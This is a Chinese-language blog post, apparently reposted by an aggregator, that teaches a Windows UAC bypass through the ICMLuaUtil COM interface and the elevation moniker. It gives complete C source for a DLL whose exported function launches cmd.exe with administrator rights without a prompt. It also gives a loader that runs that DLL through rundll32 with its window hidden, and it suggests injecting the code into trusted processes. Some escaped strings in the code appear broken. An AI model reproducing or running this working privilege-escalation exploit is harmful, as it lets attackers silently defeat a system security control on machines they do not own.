基于COM组件接口ICMLuaUtil的BypassUAC

Posted ndyxb

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了基于COM组件接口ICMLuaUtil的BypassUAC相关的知识,希望对你有一定的参考价值。

提权原理

  COM提升名称(COM Elevation Moniker)技术允许运行在用户账户控制下的应用程序用提升权限的方法来激活COM类,

  以提升COM接口权限。

  同时,ICMLuaUtil接口提供了ShellExec方法来执行命令,创建指定进程。

 

  因此,我们可以利用COM提升名称来对ICMLuaUtil接口提权,

  之后通过接口调用ShellExec方法来创建指定进程,实现BypassUAC。

 

实现思路

  和常规调用COM组件接口的方式有所不同。在初始化COM环境之后,必须通过

  CoCreateInstanceAsAdmin函数来创建COM类才能使用权限提升COM类的程序。

  (具体操作看代码演示)

 

  通过上述方法创建并激活ICMLuaUtil接口后,

  直接调用ShellExec方法来创建指定进程,实现BypassUAC。

 

 

  注意

  如果执行COM提升名称代码的程序身份是不可信的,还是会触发UAC弹窗;若是可信程序,则不会触发UAC弹窗。

  因此,必须使这段代码在WIndows可信程序中运行。可信程序有计算器、记事本、资源管理器、rundll32.exe等。

  可以通过DLL注入或是劫持技术,将这段代码注入到这些可信程序的进程空间当中。

 

  其中,最简单的方式是将代码编写在DLL文件当中,然后直接通过rundll32.exe来运行DLL,执行COM提升名称的代码。

 

 

rundll32.exe介绍

  rundll32.exe是WIndows系统中的一个程序,顾名思义,就是用来执行32位的DLL文件(DLL内部的具体函数)。

  系统中还有一个Rundll.exe文件,他的意思是“执行16位的DLL文件”。

 

  rundll32.exe的具体作用是以命令行的方式调用动态链接程序库中的规定形式的导出函数。导出函数必须是如下形式:

void CALLBACK BypassUAC(HWND hWnd, HINSTANCE hInstance, LPSTR lpszCmdLine, int iCmdShow);

 

  rundll32.exe在命令行下的使用方法为:

  

Rundll32.exe DLLname,Functionname [Arguments]

   DLLname为需要执行的DLL文件名;

  Functionname为需要执行的DLL文件的规定形式导出函数;

  [Arguments]为引出函数的具体参数。

 

 

代码演示

  这是含有COM提升名称代码导出函数的DLL源代码(包含了头文件),对于COM编程不必深究,重要的是提权的原理。

#pragma once
#ifndef BYPASS_UAC_H
#define BYPASS_UAC_H



#include "windows.h"
#include <objbase.h>
#include <strsafe.h>

#define CLSID_CMSTPLUA                     L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define IID_ICMLuaUtil                     L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"

typedef interface ICMLuaUtil ICMLuaUtil;

typedef struct ICMLuaUtilVtbl {
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE *QueryInterface)(
            __RPC__in ICMLuaUtil * This,
            __RPC__in REFIID riid,
            _COM_Outptr_  void **ppvObject);

    ULONG(STDMETHODCALLTYPE *AddRef)(
        __RPC__in ICMLuaUtil * This);

    ULONG(STDMETHODCALLTYPE *Release)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method1)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method2)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method3)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method4)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method5)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method6)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *ShellExec)(
        __RPC__in ICMLuaUtil * This,
        _In_     LPCWSTR lpFile,
        _In_opt_  LPCTSTR lpParameters,
        _In_opt_  LPCTSTR lpDirectory,
        _In_      ULONG fMask,
        _In_      ULONG nShow
        );

    HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)(
        __RPC__in ICMLuaUtil * This,
        _In_      HKEY hKey,
        _In_opt_  LPCTSTR lpSubKey,
        _In_opt_  LPCTSTR lpValueName,
        _In_      LPCTSTR lpValueString
        );

    HRESULT(STDMETHODCALLTYPE *Method9)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method10)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method11)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method12)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method13)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method14)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method15)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method16)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method17)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method18)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method19)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method20)(
        __RPC__in ICMLuaUtil * This);
    END_INTERFACE
} *PICMLuaUtilVtbl;

interface ICMLuaUtil
{
    CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl;
};

void CALLBACK BypassUAC(HWND hWnd, HINSTANCE hInstance, LPSTR lpszCmdLine, int iCmdShow);

HRESULT CoCreateInstanceAsAdmin(HWND hWnd, REFCLSID rclsid, REFIID riid, PVOID *ppVoid);

BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable);

#endif
#include "pch.h"
#include "CBypassUAC.h"


HRESULT CoCreateInstanceAsAdmin(HWND hWnd, REFCLSID rclsid, REFIID riid, PVOID *ppVoid)
{
    BIND_OPTS3 bo;
    WCHAR wszCLSID[MAX_PATH] = { 0 };
    WCHAR wszMonikerName[MAX_PATH] = { 0 };
    HRESULT hr = 0;

    // 初始化COM环境
    ::CoInitialize(NULL);

    // 构造字符串
    ::StringFromGUID2(rclsid, wszCLSID, (sizeof(wszCLSID) / sizeof(wszCLSID[0])));
    hr = ::StringCchPrintfW(wszMonikerName, (sizeof(wszMonikerName) / 
        sizeof(wszMonikerName[0])), L"Elevation:Administrator!new:%s", wszCLSID);
    if (FAILED(hr))
    {
        return hr;
    }
    // 设置BIND_OPTS3
    ::RtlZeroMemory(&bo, sizeof(bo));
    bo.cbStruct = sizeof(bo);
    bo.hwnd = hWnd;
    bo.dwClassContext = CLSCTX_LOCAL_SERVER;
    // 创建名称对象并获取COM对象
    hr = ::CoGetObject(wszMonikerName, &bo, riid, ppVoid);
    return hr;
}

BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable)
{
    HRESULT hr = 0;
    CLSID clsidICMLuaUtil = { 0 };
    IID iidICMLuaUtil = { 0 };
    ICMLuaUtil *CMLuaUtil = NULL;
    BOOL bRet = FALSE;
    do {
        ::CLSIDFromString(CLSID_CMSTPLUA, &clsidICMLuaUtil);
        ::IIDFromString(IID_ICMLuaUtil, &iidICMLuaUtil);

        // 提权
        hr = CoCreateInstanceAsAdmin(NULL, clsidICMLuaUtil, iidICMLuaUtil, (PVOID*)(&CMLuaUtil));
        if (FAILED(hr))
        {
            break;
        }

        // 启动程序
        hr = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, lpwszExecutable, NULL, NULL, 0, SW_SHOW);
        if (FAILED(hr))
        {
            break;
        }
        bRet = TRUE;
    } while (FALSE);

    // 释放
    if (CMLuaUtil)
    {
        CMLuaUtil->lpVtbl->Release(CMLuaUtil);
    }
    return bRet;
}


void CALLBACK BypassUAC(HWND hWnd, HINSTANCE hInstance, LPSTR lpszCmdLine, int iCmdShow)
{
    CMLuaUtilBypassUAC((LPWSTR)L"C:\Windows\System32\cmd.exe");
}
    //调用rundll32.exe去执行RemoteThreadDll.dll的导出函数 达到BypassUAC
    char szCmdLine[MAX_PATH] = { 0 };
    char szRundll32Path[MAX_PATH] = "C:\Windows\System32\rundll32.exe";

    //获取当前程序所在路径
    char pszFileName[MAX_PATH] = { 0 };
    GetModuleFileNameA(NULL, pszFileName, MAX_PATH);
    //获取当前程序所在目录
    (strrchr(pszFileName, \))[0] = 0;
    //拼接要注入dll路径
    char pszDllName[MAX_PATH] = { 0 };
    sprintf_s(pszDllName, "%s\%s", pszFileName, "RemoteThreadDll.dll");
    USES_CONVERSION;
    sprintf_s(szCmdLine, "%s %s %s", szRundll32Path, pszDllName, "BypassUAC");
    WinExec(szCmdLine, SW_HIDE);

 

以上是关于基于COM组件接口ICMLuaUtil的BypassUAC的主要内容,如果未能解决你的问题,请参考以下文章

c#编程,添加引用时,COM和.NET有啥区别?代表啥意思

DCOM(分布式组件对象模型)原理浅析

基于 飞鹅云开放平台 的 PHP 接口组件

后台接口平台 基于Laravel 开发 快速开发数据接口

第三方接口调用封装

基于element ui的级联选择器组件实现的分类后台接口